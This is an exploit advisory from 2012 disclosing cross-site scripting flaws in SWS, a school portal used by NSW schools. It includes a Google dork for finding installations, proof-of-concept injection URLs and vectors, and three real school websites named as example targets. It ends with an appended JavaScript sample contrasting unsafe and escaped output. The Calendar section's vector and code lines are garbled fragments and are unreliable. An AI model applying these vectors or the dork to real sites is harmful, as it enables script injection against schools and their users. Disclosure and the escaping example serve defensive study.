===============================================================
= # Exploit Title: SWS - Cross Site Scripting vulnerabilities =
= # Date: 23/04/2012                                          =
= # Author: Phizo                                             =
= # Manufacturer: www.schoolwebsitesolutions.com              =
= # Version: Latest (Private software, no version number)     =
= # Category: webapps                                         =
= # Google dork: inurl:schools.nsw.edu.au/sws/                =
= # Tested on: Windows 7 & Ubuntu 10.04 - (Firefox 11.0)      =
===============================================================

[+] Information:

SWS is a private portal software created for NSW schools only, hence why I could not gather details such as the version of the software.
Multiple XSS vulnerabilities are shown below to demonstrate the insecurity of the portal software.

[+] Details:

========
 Search -- (Value contained within script tags)
========

# PoC: http://victim/search?search=[XSS]

# Vulnerable code: a.execute("VALUE"); -- VALUE is the value of user input.

# Vector used: '); alert("XSS"); ('

# Output: a.execute("");alert("XSS");("");

==========
 Calendar
==========

# PoC: http://victim/calendar?p_p_col_count=3&p_p_col_id=column-1&p_p_col_pos=2&p_p_id=eppvanillacalendarportlet_WAR_eppvanilladefaultportlet&p_p_lifecycle=0&p_p_mode=view&p_p_state=normal&startdate=23-3-2012">[XSS]

# Vulnerable code: (multiple hyperlinks, however I will provide one). Print this page

# Vector used: ">

# Output: &print=true" target="_blank" class="printmonth">Print this page

[+] Example sites:

http://www.cook-s.schools.nsw.edu.au/
http://www.lawrenceha-s.schools.nsw.edu.au/
http://www.parameadow-s.schools.nsw.edu.au/
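
Added example (not part of the original advisory and not SWS code): the two injection contexts described above, a JavaScript string literal and a double-quoted href attribute, each shown as the vulnerable concatenation beside a context-encoded version. Function names and the href layout are assumptions, and the sample inputs are constructed.

```javascript
// Added example, not SWS code. Function names and the href layout are assumed.

// Sink 1 (Search): value concatenated into a JavaScript string literal.
function renderSearchUnsafe(value) {
  return 'a.execute("' + value + '");';
}

// Escape every character outside [A-Za-z0-9 ] as \uXXXX so the value cannot
// close the string literal or the enclosing <script> element.
function jsStringEscape(value) {
  return String(value).replace(/[^A-Za-z0-9 ]/g, (ch) =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

function renderSearchSafe(value) {
  return 'a.execute("' + jsStringEscape(value) + '");';
}

// Sink 2 (Calendar): startdate concatenated into a double-quoted href.
function renderPrintLinkUnsafe(startdate) {
  return '<a href="/calendar?startdate=' + startdate +
    '&print=true" target="_blank" class="printmonth">Print this page</a>';
}

const DATE_RE = /^\d{1,2}-\d{1,2}-\d{4}$/; // d-m-yyyy, e.g. 23-3-2012
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function htmlAttrEscape(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Validate the date shape first, then URL-encode the parameter and
// HTML-encode the whole attribute value.
function renderPrintLinkSafe(startdate) {
  if (!DATE_RE.test(startdate)) return null; // reject anything that is not a date
  const href = '/calendar?startdate=' + encodeURIComponent(startdate) + '&print=true';
  return '<a href="' + htmlAttrEscape(href) +
    '" target="_blank" class="printmonth">Print this page</a>';
}

// Constructed sample inputs (the first reproduces the Output line above).
const SEARCH_INPUT = '");alert("XSS");("';
const DATE_INPUT = '23-3-2012"><i>marker</i>';
console.log(renderSearchUnsafe(SEARCH_INPUT));
console.log(renderSearchSafe(SEARCH_INPUT));
console.log(renderPrintLinkUnsafe(DATE_INPUT));
console.log(renderPrintLinkSafe(DATE_INPUT), renderPrintLinkSafe('23-3-2012'));
```

The escaped search value still evaluates to the original text when the script runs, so search behaviour is unchanged while the string delimiter can no longer be closed by the input.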